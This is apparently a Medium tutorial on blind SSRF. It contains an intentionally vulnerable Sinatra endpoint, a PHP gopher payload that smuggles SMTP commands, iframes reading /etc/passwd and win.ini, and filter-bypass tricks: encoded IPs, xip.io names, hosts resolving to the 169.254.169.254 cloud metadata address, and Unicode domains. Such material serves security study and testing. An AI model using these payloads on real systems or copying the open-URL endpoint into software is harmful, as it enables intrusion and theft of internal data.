SSRF — Server Side Request Forgery (Types and ways to exploit it) Part-2

We discussed Basic SSRF in Part -1, now we will continue with Blind

ii. Blind -

require 'sinatra'
require 'open-uri'

get '/' do
open params[:url]

'done'
end
  • 127.0.0.1/32
  • 172.16.0.0/12
  • 192.168.0.0/16
<?php
$commands = array(
'HELO test.org',
'MAIL FROM: <admin@server.com>',
'RCPT TO: <bit-bucket@test.smtp.org>',
'DATA',
'Test mail',
'.'
);
$payload = implode('%0A', $commands); header('Location: gopher://test.smtp.org:25/_'.$payload);
?>

2. Test Cases -

Places to look for SSRF

POST /test/demo_form.php HTTP/1.1
Host: example.com
url=https://example.com/as&name2=value2
<iframe src=”file:///etc/passwd” width=”400" height=”400"><iframe src=”file:///c:/windows/win.ini” width=”400" height=”400">
<input type=”file” id=”upload_file” name=”upload_file[]” class=”file” size=”1" multiple=””>
<input type=”url” id=”upload_file” name=”upload_file[]” class=”file” size=”1" multiple=””>

3. Bypass Whitelisting and Blacklisting -

Lets talk about whitelisting and blacklisting first

http://0177.0.0.1/ = http://127.0.0.1
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
          10.0.0.1.xip.io   resolves to   10.0.0.1
www.10.0.0.1.xip.io resolves to 10.0.0.1
mysite.10.0.0.1.xip.io resolves to 10.0.0.1
foo.bar.10.0.0.1.xip.io resolves to 10.0.0.1
ssrf-cloud.localdomain.pw resolves to 169.254.169.254
metadata.nicob.net resolves to 169.254.169.254
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com

List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

🥵

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store